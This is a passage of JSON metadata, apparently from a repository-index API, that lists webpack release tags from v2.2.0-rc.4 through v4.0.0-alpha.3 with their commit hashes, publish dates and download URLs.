319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v